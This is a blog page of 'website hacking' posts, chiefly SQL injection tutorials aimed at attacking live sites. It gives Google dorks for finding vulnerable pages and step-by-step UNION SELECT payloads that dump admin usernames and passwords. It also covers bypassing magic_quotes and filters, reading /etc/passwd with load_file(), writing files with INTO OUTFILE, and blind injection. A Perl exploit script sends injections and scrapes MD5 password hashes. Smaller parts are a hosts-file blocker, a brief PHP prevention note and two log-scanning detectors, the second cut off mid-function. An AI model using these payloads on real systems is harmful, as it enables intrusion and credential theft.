Showing posts with label website hacking. Show all posts

Wednesday, January 25, 2012

How to block a website from your pc

hello friends


I am here to post how to block any website on your PC, to stop unwanted access to it.
It is quite easy to use.
Follow the steps ...

Step 1: open any C++ compiler

Step 2: paste the following code into the compiler
    #include <fstream>
    #include <iostream>
    #include <string>

    using namespace std;

    int main()
    {
        string site;   // std::string instead of a fixed char[20], so long names cannot overflow
        cout << "Enter the Name of the Site to Block\n";
        if (!(cin >> site) || site.empty()) {
            cout << "No site name entered\n";
            return 1;
        }

        // Append to the Windows hosts file; the open only succeeds when the
        // program is run as administrator.
        ofstream out("C:/Windows/System32/drivers/etc/hosts", ios::app);
        if (!out) {
            cout << "Either File Not Found or Permission Denied, Run as Admin the EXE of the Program\n";
            return 1;
        }

        // Each mapping goes on its own line so it does not run into the last existing entry.
        out << "\n127.0.0.1\t" << site << "\n";
        out.close();
        cout << site << " is blocked\n";
        return 0;
    }
Step 3: save it as a .cpp file

Step 4: compile it and run it

Step 5: run the .exe file as administrator
done......
any problem, comment here...


bikash

Monday, January 16, 2012

URL based SQL injection tutorial



Introduction:
SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution.
Finding Sites:
When talking about finding a vulnerable site for SQL injection you will hear the term "dork" a lot; this refers to a Google search term targeted at finding vulnerable websites. An example of a Google dork is inurl:news.php?id=; entering this string in the Google search engine would return all sites from Google's cache with the string news.php?id= in their URL.
Ex:
http://www.site.com/news.php?id=4
To be vulnerable to SQL injection a site has to have a GET parameter in the URL.
In http://www.site.com/news.php?id=4, id=4 is the GET parameter: the value 4 is used to fetch the matching record from the backend database.
Checking Vulnerability: To check if the site is vulnerable to SQLi the most common way is to just add an apostrophe ( ' ) after one of the parameters in the URL.
Ex:
http://www.site.com/news.php?id=4'
Now if the site is vulnerable it will show an error like:
You have an error in your SQL Syntax
Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()
If you see any of these errors when entering ' after the number or string of the parameter then the chances are the site is vulnerable to SQLi attacks to some extent. That is not the only way to know whether the site is vulnerable: the "error" can also take the form of part of the page simply disappearing, such as a news article, body text or images. If this happens then the site is vulnerable too.
Finding number of columns: After you find that the site is vulnerable the next step is to find the number of columns in the table that is in use. There are a couple of ways to do this, like ORDER BY or GROUP BY. Here I will use ORDER BY. To find the number of columns start with ORDER BY 1.
Ex.
http://www.site.com/news.php?id=4 ORDER BY 1--
If it doesn't error then you can probably use the ORDER BY command. Sometimes you will get an error on ORDER BY 1; if it gives an error then simply move on to another site. If it doesn't error then I always go to ORDER BY 10000 (because a table can't have 10000 columns in it) to see if it gives an error.
Ex.
http://www.site.com/news.php?id=4 ORDER BY 10000--
Sometimes it doesn't error as it should; then I use AND 1=0 before the ORDER BY query to get an error.
Ex.
http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000--
After getting the error on 10000 it's up to you how you find the number of columns. I start with 100 and halve the number until I get closer. Something like this:
http://www.site.com/news.php?id=4 ORDER BY 100--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3--
NO ERROR
As 6 is giving an error and 3 is not, the number of columns is either 3, 4 or 5.
http://www.site.com/news.php?id=4 ORDER BY 4--
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5--
ERROR
After this you can conclude that the website has 4 columns, as it gives an error above ORDER BY 4 and doesn't error at ORDER BY 4 or below.
NOTE: Comments are not necessary every time when injecting a website, although sometimes they are. Possible comments to use are:
--
/*
/**/
#
Getting MySQL version: This is an important step because if the MySQL version is lower than 5 then we have to guess the names of the tables and columns to inject, which sometimes gets frustrating, so I would recommend that beginners work on version 5. Before finding the version we have to find the visible column number to inject our query into to get a result. To do this we will use the SELECT statement and the UNION ALL statement.
http://www.site.com/news.php?id=4 UNION ALL SELECT 1,2,3,4--
It will return numbers back in the data's place; if it doesn't then add a negative sign after the equals sign, put null in place of the number after the equals sign, or add AND 1=0 before the UNION query.
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4--
http://www.site.com/news.php?id=null UNION ALL SELECT 1,2,3,4--
http://www.site.com/news.php?id=4 AND 1=0 UNION ALL SELECT 1,2,3,4--
Now say we got back the number 3, so this is the column that we can retrieve data from. To get the database version there are two ways, either version() or @@version; let's use them:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version()),4--
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version),4--
If you get an error like "Illegal mix of collations when using @@version", then you have to convert it from UTF-8 into latin1 as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(convert(@@version using latin1)),4--
NOTE: We are completely replacing the number 3 with our query; something like 1,2,group_concat(@@version),3,4-- will result in an error.
If it worked you will get the version of MySQL. You will see something like 5.0.45, 5.0.13-log, 4.0.0.1 etc. All we need to focus on is the first number, i.e. 4 or 5. If it is 5 then keep going, but if it is 4 and you are new then you should move on to another website, because we would have to guess the table names in order to extract the data.
NOTE: Sometimes you will get frustrated to find that you spent 5-10 minutes just getting the database version, after applying ORDER BY, UNION SELECT and version() in queries, and the result is MySQL 4. So to save time in getting the database version I use inferential (blind) SQL injection to get the version of MySQL. Do as follows:
http://www.site.com/news.php?id=4 AND 1=1--
NO ERROR
http://www.site.com/news.php?id=4 AND 1=2--
ERROR
http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=4--
If the page comes back true then the version is 4.
http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=5--
If the page comes back true then the version is 5.
If the version is 5 then you can start with ORDER BY and continue, because you already know the version is 5 and you will not have to guess the table names. Although, I would recommend that beginners use ORDER BY.
GETTING NAME OF DATABASES: Getting the database names is very important because sometimes the current database the webpage is running on does not contain useful information such as usernames and passwords. So it is good to have a look at all the databases. In MySQL version 5 or higher there is always a database named 'information_schema' which makes SQL injection easier. To get the list of the databases use this:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(schema_name),4 from information_schema.schemata--
Now you will get the names of all the databases at the same position where you saw the version of MySQL before.
Ex: information_schema,db_site,db_main
To know which database you are working on use database() in the query as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(database()),4--
Now you will get the current database. Ex: db_site
To know the current user of the database use user(); although it's not necessary, it's good to know.
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(user()),4--
Now you should get the current user of the database. Ex: user@localhost.
To save your time you can use a query to display version, current database and user all at once as:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version(),0x3a,database(),0x3a,user()),4--
or
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),version(),database(),user()),4--
Getting Table Names: It is a good habit to check the table names of all the databases because sometimes the current database does not contain useful information.
To get the table names of the current database:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
Assume it gave you the following names of the tables contained in the current database (in our example db_site).
Ex. News, Gallery, Games etc.
As you can see it does not look useful, so get the table names of the other database (in our example db_main); but to do so you have to encode the name of the database in hexadecimal form and put '0x' in front of the hex-encoded name to tell the database that it is hex encoded and needs to be decoded to get the right name. In our example we need to get the table names of the database 'db_main'; after encoding it to hex it is equivalent to '64625f6d61696e'. To get the table names of the database 'db_main':
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x64625f6d61696e--
It will give you the names of all tables in the database 'db_main'.
Ex: newsletters, posts, Administrator
Now we can see that this is good stuff.
NOTE: Online Text to Hex converter: http://www.swingnote.com/tools/texttohex.php
Getting Column Names: Now to extract data from the table Administrator we need to find the columns in it. To get this you would do:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e6973747261746f72--
NOTE: We replaced 'information_schema.tables' with 'information_schema.columns' and 'table_schema' with 'table_name'. Again we encoded 'Administrator' in hex to get our query to work.
Now you should see the column names.
Ex: Id,Username,Password
Now to extract data from the columns 'Id,Username,Password' of table 'Administrator' of database 'db_main', you would do (the column count stays at 4, as the note above requires):
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)),4 from db_main.Administrator--
Sometimes it will not work; then you have to encode 'db_main.Administrator' into hex:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)),4 from 0x64625f6d61696e2e41646d696e6973747261746f72--
Now you will get what you were looking for.
If you find that I have written something that is wrong, please address it and I will fix it. :)

Tuesday, November 8, 2011

SQL injection using perl

[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …

—+— StArT
[1] Introduction
Perl can be considered a very powerful programming language if we think of the internet context. In fact we can make a lot
of operations across the internet just writing a little bit of code. So I decided to write a similar guide to make an
easier life for everyone who decides to start writing a Perl exploit.
There are a few requisites u need to proceed:
- U must know the basic operations of Perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using Perl code in an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some "Perl modules".
Those modules must be put at the head of the script. In this tut we are going to use only the "IO::Socket" module, but
there are thousands, and if u are curious just search on CPAN to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl interpreter able to use this module u must write at the start
of the script "use IO::Socket;". With this module u'll be able to connect to every server defined previously, using
a chomp; look at the example.
Example:
print "Insert the host to connect: ";
chomp($host = <STDIN>);
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new socket that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80")
    or die " ]+[ Connecting ... Can't connect to host.\n\n";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using port 80 and directed to the host specified in the chomp
($host = www.host.com).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect to
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real heart of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement we must inject, now we are going to see how to do this.
The SQL code must be treated like a normal variable (like "$injection").
Example:
$injection = "/index.php/forum?=[SQL_CODE]";
This string means that we are going to inject the query into the "index.php/forum" path, following the correct syntax that
will bring us to cause a SQL injection ("?=").
Now we must create a piece of code that will go and inject this query into the vulnerable host.
print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
This piece of code is the most important one in the building of an exploit.
It can be considered the "validation" of the connection.
In this case the "print" command doesn't show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a "GET" to the selected page defined in "$injection".
In the third line it tells the host "who/what" is making the "GET" request. In this case this is Hacker, but it
can be "Mozilla/5.0 Firefox/1.0.4" or other.
In the fourth line it defines the host to connect to, "$host".
With the execution of this script we have made our injection.
Resume of the exploit:
use strict;
use warnings;
use IO::Socket;

print "Insert the host to connect: ";
chomp(my $host = <STDIN>);

# open a TCP connection to port 80 of the host typed above
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80")
    or die " ]+[ Connecting ... Can't connect to host.\n\n";

# the path plus the SQL to inject; [SQL_CODE] is the statement u want to send
my $injection = "/index.php/forum?=[SQL_CODE]";

# the request line and headers, each terminated by a newline, blank line at the end
print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
close($sock); # this line terminates the connection
A little trick:
Assuming that, with the execution of the SQL inj, u want to retrieve an MD5 hash PWD, u must be able to recognize it.
Additionally, u want your script to show the PWD on your screen.
Well, to make this, the next piece of code could be one of the possible solutions.
# read the server's answer line by line until a 32-character hex word appears
while (my $answer = <$sock>) {
    if ($answer =~ /([0-9a-f]{32})/) {
        print "]+[ Found! The hash is: $1\n";
        exit();
    }
}
This code means that if the answer of the host shows a "word" made of 32 characters ("0" to "9" and "a" to "f"),
this word must be considered the MD5 hash PWD and it must be shown on screen.
Conclusions:
The method shown in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could also use the module "LWP::Simple" in place of "IO::Socket", but u should change something in the code.
This method can be used also, not only for SQL injection, but, for example, remote file upload or other.
FEEL FREE TO COMMENT 

REGARDS 
BIKASH

prevention of sql injection in php

To avoid SQL injection attacks, please follow these simple mechanisms in PHP:
1) Always restrict the length of the form fields, e.g. don't allow more than 20 characters in fields like username and password, with the "maxlength" property available in the HTML form.
2) Always validate for proper input, like whether the value is a valid email or not, is numeric or not, is a valid date or not, etc.
3) Finally, always use the mysql_real_escape_string() function before sending the variable to the SQL query, it ad. For example (note that you must be connected to the database to use this function):

Code:
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);

If an intruder injects ' OR 1 in the username and password fields then the values of $username and $password will become \' OR 1, which is not going to harm us anymore.



This might also help someone:
.htaccess

Code:
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a


Thursday, November 3, 2011

The complete guide to SQL Injections

Hello eghacking readers......
This article is about a technique which is used for hacking the websites and the technique is very popular among hackers. The technique is known as SQL Injections.


So, lets start reading ............


What is SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.



0x00 - Intro
All the information contained in this article is from personal experience; if I don't go over something that you currently do or have seen in SQL injections, it's because I do not use it. I'm not saying I'm right, that's just how it is. As you should already know, extracting database information from a server without the administrator's approval is illegal, and I cannot be held accountable for any malicious actions executed after reading this article.


0x01 - What is MySQL
"SQL" stands for "Structured Query Language," which simply allows users to send queries to the server database. There are different types of SQL such as MySQL, which is Microsoft's version of the language and also has some different commands as well as syntax.


0x02 - Finding SQL Injections
Before jumping into this topic I want to explain to you about comments in MySQL. There are three variations to a comment in this language:

--


/*


#


As you should already know a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a parameter such as:

?id=


?category_id=


?user_id=


(not saying injections are narrowed down to only id parameters but they are quite common) you may want to test the page for a vulnerability. The simplest way I know of to check for a vulnerability is to add:

" and 1=1--


to the end of the URL and see if the contents of the page change, even the slightest bit, if they don't then add

" and 1=0--


(it doesn't have to be 1=1 or 1=0 just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.


0x03 - Gathering Information
To make your job or life a little easier you should look around the site to gather information on what you are trying to retrieve. For instance, if the site has a user registration, look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright, so once you have found some good information to look forward to, it's time to find out how many columns are being selected from the database by the original query. This is an important step because if the number of columns you "select" and the number in the original are not identical, the injection does not work! To find out the number of columns you simply add "order by x" to the end of your vulnerable URL, replacing "x" with an increasing number until you get an error

http://www.site.com/vulnerable.php?id=4 order by 9--

the number of columns being selected is the value of x before the error.


0x04 - The Injection
I suppose this is where some people get confused. In MySQL, in order to combine two query statements you can use the keyword "union"; you can also include the keyword "all", which will display all results (the default behaviour of union is to remove duplicate results from the display). After your "union all" you also need to include the keyword "select", since we are going to want to select database information and display it on the screen. So far you should be looking at something similar to:

http://www.site.com/vulnerable.php?id=4 union all select


Continuing the injection like the previous example will work fine, but it will also display all the original results as well as our new results. Typically, to bypass this, I, as well as most other people exploiting SQL injections, replace the id value (in the case of our example it would be 4) with one of the following:

-1


null


or any value that would not be in the database; this way the original select query will not return anything but our new injected select query will display. In SQL each column being selected must be separated by a comma (,), so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatenate those onto your injection; I like to set each column to a different numeric value so that I can keep track of which columns are actually being displayed on the screen. So far, if everything has been going well, you should have an injection URL looking something like:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4--


If not then go back and keep reading it until you figure it out. The last part of our injection setup is telling the query which table to "select" the information from; we do this with the keywords "from table"... pretty self-explanatory, right? So for example, if we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table, we can have a setup such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--


Easy enough so far, now is where it gets a little more difficult, but not too much.


0x05 - Tables and Columns
Depending on the version of MySQL the administrators are running on the server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version is running on the server, can you guess? If you did not guess version(), why the hell not, it's like one of the easiest and most self-explanatory things ever! Anyway, replace one of the columns in your injection that displays on the screen with the function call version() and this will tell you which version; typically it's either 4.x.x or 5.x.x. If they are running some form of version 4 then you're basically on your own when it comes to figuring out table and column names (I'll post some examples of common names later); though if version 5 is implemented then your life is easy. As of version 5.1 of MySQL the developers began to automatically include a master database on the server called INFORMATION_SCHEMA. Within information_schema there are tables that give information about all the tables, columns, users, etc. on the entire SQL server (to find out more about the structure of information_schema and the table/column names visit http://dev.mysql.com/doc/refman/5.0/en/information-schema.html). Once you figure out a table name and some column names within that table you want to look at, just place them into our injection setup from before; suppose we have a site that has a "users" table and columns "user" and "pass" and the second and third columns are displayed on the screen, we could view these with an injection such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,user, pass, 4 from users--


This example will display both the user and pass on the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is a function called concat() which simply concatenates fields together, so to simplify our previous example we could have:

http://www.site.com/vulnerable.php?id=-1 union all select 1, concat(user,0x3a, pass), 3, 4 from users--



"0x3A" is just a colon(:) in hexadecimal, simply to separate the two fields for my own viewing.


0x06 - Narrowing down the Selection
Typically when performing a SQL injection there are multiple results you want to look at, or possibly just one individual. There are a couple of ways to narrow down your selection. The first way is to use the "where" keyword, which takes a logical parameter such as "where id=1"; this would look in the id column of the table and find which row is equal to 1. The next way is to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selection. limit takes two parameters: where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have:

http://www.site.com/vulnerable.php?id=-1 union all select user from users limit 0,1--


to look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) separated by a comma(,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use).


0x07 - Obstacles
Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make SQL injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation mark and breaks it by adding a backslash (\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ASCII values and generates the corresponding character value, thus eliminating the need for a quote. Example time... say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is equal to "admin", and the site only selects one column in the original query. Easy enough, right? We learned this earlier:

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user="admin"--


Curve ball! The developers have enabled magic_quotes, therefore your "admin" will not work properly... I know, it's sad. To fix it we simply take the ASCII values of each character (http://crashoverron.t35.com/ascii.php), so now we get:

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user=char(97,100,109,105,110)--


TA-DA! Injection fixed. Another safety feature they try to block us with is regular expressions that search our input, but often they have their expressions set to such narrow possibilities that you can bypass them by simply changing the case, the comment symbol, or replacing spaces with "+" (SQL is not case sensitive, and it also treats "+" as a space filler, much like a space).
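What the probes from this post (sections 0x02 to 0x07) and from the "URL based SQL injection tutorial" earlier on this page look like from the server side, as an added example that is not part of the original posts and not the author's code: a small Python scanner (Python is used here only for the log-side check; the material above is PHP/MySQL) that parses constructed Apache-style access log lines, URL-decodes and lower-cases each query string so the case-changing and "+"-for-space variations just described collapse to one form, and then matches the stages of the procedure (trailing apostrophe, ORDER BY counting, UNION ALL SELECT against information_schema, boolean tests, @@version fingerprinting). The log lines, addresses and rule names are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample of an Apache-style access log. Addresses, paths and
# payloads are invented; the payloads mirror the tutorial's probes, one of
# them written in mixed case with '+' for spaces.
SAMPLE_LOG = """
198.51.100.7 - - [16/Jan/2012:10:01:02 +0000] "GET /news.php?id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [16/Jan/2012:10:01:09 +0000] "GET /news.php?id=4' HTTP/1.1" 500 311
198.51.100.7 - - [16/Jan/2012:10:01:15 +0000] "GET /news.php?id=4%20ORDER%20BY%2010000-- HTTP/1.1" 500 311
198.51.100.7 - - [16/Jan/2012:10:02:40 +0000] "GET /news.php?id=-4+UnIoN+aLl+SeLeCt+1,2,group_concat(schema_name),4+from+information_schema.schemata-- HTTP/1.1" 200 4870
198.51.100.7 - - [16/Jan/2012:10:03:01 +0000] "GET /news.php?id=4%20AND%20substring(@@version,1,1)=5-- HTTP/1.1" 200 5120
203.0.113.9 - - [16/Jan/2012:10:05:00 +0000] "GET /gallery.php?id=12 HTTP/1.1" 200 7740
203.0.113.9 - - [16/Jan/2012:10:05:04 +0000] "GET /search.php?q=rock+and+roll HTTP/1.1" 200 2210
"""

# Common/combined log format: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures run against the decoded, lower-cased query string, so the
# mixed-case and '+' variants match just like the plain form.
RULES = [
    ("quote_probe", re.compile(r"'(\s*$|\s*(or|and)\b)")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.")),
    ("boolean_probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
    ("version_fingerprint", re.compile(r"@@version|\bversion\(\)")),
]


def normalize_query(url):
    """URL-decoded, lower-cased, whitespace-collapsed query string of a request URL."""
    query = urllib.parse.urlsplit(url).query
    query = urllib.parse.unquote_plus(query)  # %20 -> ' ' and '+' -> ' '
    return re.sub(r"\s+", " ", query).strip().lower()


def classify(query):
    """Names of every rule that matches the normalized query string, in RULES order."""
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text):
    """Parse each log line and report the ones whose query string trips a rule."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(normalize_query(m.group("url")))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "url": m.group("url"),
                "status": int(m.group("status")),
                "rules": hits,
            })
    return findings


def probing_clients(findings, min_rules=2):
    """Clients that tripped at least `min_rules` distinct rules: one match may be
    a false positive, a spread across the tutorial's stages rarely is."""
    seen = {}
    for f in findings:
        seen.setdefault(f["ip"], set()).update(f["rules"])
    return sorted(ip for ip, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f["ip"], f["status"], f["rules"], f["url"])
    print("probing clients:", probing_clients(hits))
```

Run it directly to print the flagged lines. A single match is noisy (a search term with a trailing apostrophe trips quote_probe), which is why probing_clients() only raises a client that tripped several distinct rules, the pattern the step-by-step procedure above produces. Matching the raw URL instead of the decoded query string would miss the %20 and mixed-case forms.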


0x08 - Additional opportunities
Although I said before that version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(). I'm not saying the function is exclusive to version 4, but from my experience it is most commonly enabled for the current user by developers, for some reason, in this version. load_file() acts just like file_get_contents() from PHP in that it returns the contents of the file as a string. If enabled this allows for more than just SQL-style hacks on the server; it now allows for LFI vulnerabilities as well. However, load_file() needs the exact full path to the file you are trying to open, for example /home/CrashOverron/Desktop/file, and if input as a literal string then it must be enclosed in quotes, which brings back the issue of magic_quotes, but as before just use the char() function. The next interesting feature, which is hardly ever possible but I have seen it happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(). In order to use either of these features the user that MySQL is currently running as must have the FILE privilege on the server. Again, the full path is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes here. Time for an example of both; here is the situation: the vulnerable site has 1 column selected and also has a "users" table. load_file, no magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file('/etc/passwd')--


load_file with magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--


INTO OUTFILE:

http://www.site.com/vulnerable.php?id=-1 union all select "test" INTO OUTFILE "/etc/test" from users--



0x09 - Blind SQL Injection
Blind SQL injection occurs when the original select query obtains column information but does not display it on the screen. In order to continue through a blind SQL injection you must basically brute-force any value you want to know. There are a few functions we can use in conjunction with each other that make this quite easy yet tedious; those would be the mid() and ascii() functions. mid() is MySQL's substring function, and ascii() does the exact opposite of char(): it takes a character and exchanges it for the corresponding ASCII numeric value. Doing this allows us to determine the range each of our desired values lies in on the ASCII chart, thus narrowing each down until we find a match. Example situation: we have found a site that is vulnerable to blind SQL injection and we want to figure out which user MySQL is currently running as; our injection sequence could look something like:

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),1,1)) < 97--


(this will tell us if the first letter of the user name is above or below "a"; we then change the 97 to a different value until we find the first letter)

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),2,1)) < 97--


(just repeat as before, incrementing the position through the letters, and you will eventually have the current user)
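From the defender's side, the load_file()/INTO OUTFILE requests above and the blind probes just described both leave a distinctive trail in the web server's access log: UNION ... SELECT, file functions, comment terminators, and long runs of near-identical requests that differ only in the ascii(mid(...)) position or comparison value. The following Python script is an added example, not part of the original post, that scans constructed access-log lines (combined log format, made-up hostnames and documentation-range addresses) for those indicators after URL-decoding each query parameter, and tallies them per client address.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log in Apache/nginx "combined"-like format. The
# addresses come from documentation ranges and the site is made up; none of
# these lines come from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jan/2012:10:00:01 +0000] "GET /news.php?id=4 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2012:10:00:05 +0000] "GET /news.php?id=4' HTTP/1.1" 500 310
203.0.113.7 - - [16/Jan/2012:10:00:09 +0000] "GET /vulnerable.php?id=-1%20union%20all%20select%20load_file('/etc/passwd')-- HTTP/1.1" 200 4096
203.0.113.7 - - [16/Jan/2012:10:00:12 +0000] "GET /vulnerable.php?id=1%20and%20ascii(mid(user(),1,1))%20%3C%2097-- HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2012:10:00:13 +0000] "GET /vulnerable.php?id=1%20and%20ascii(mid(user(),1,1))%20%3C%20112-- HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2012:10:00:14 +0000] "GET /vulnerable.php?id=1%20and%20ascii(mid(user(),2,1))%20%3C%2097-- HTTP/1.1" 200 5120
198.51.100.20 - - [16/Jan/2012:10:01:00 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5012
198.51.100.20 - - [16/Jan/2012:10:01:30 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2210
"""

# One combined-format request line: client, timestamp, method, target, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Indicators are matched against the URL-decoded value of each query parameter.
# "union station" in a search box must not trip the union_select rule, so the
# patterns insist on the full keyword sequence rather than single words.
INDICATORS = [
    ("quote_probe", re.compile(r"^\d+'$")),                       # id=4'
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file_access", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
    ("blind_probe", re.compile(r"\bascii\s*\(\s*(?:mid|substr|substring)\s*\(", re.I)),
    ("comment_terminator", re.compile(r"--\s*$")),                # trailing -- to drop the rest of the query
]


def classify_value(value: str) -> list[str]:
    """Return the indicator tags that match one URL-decoded parameter value."""
    return [tag for tag, rx in INDICATORS if rx.search(value)]


def scan_access_log(text: str) -> list[dict]:
    """Parse each request line and report every parameter that matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        query = urlsplit(m["target"]).query
        # parse_qsl URL-decodes each value, so the patterns see the text the
        # application's database driver would have seen
        for name, value in parse_qsl(query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                                 "param": name, "tags": tags})
    return findings


def summarize(findings: list[dict]) -> dict[str, Counter]:
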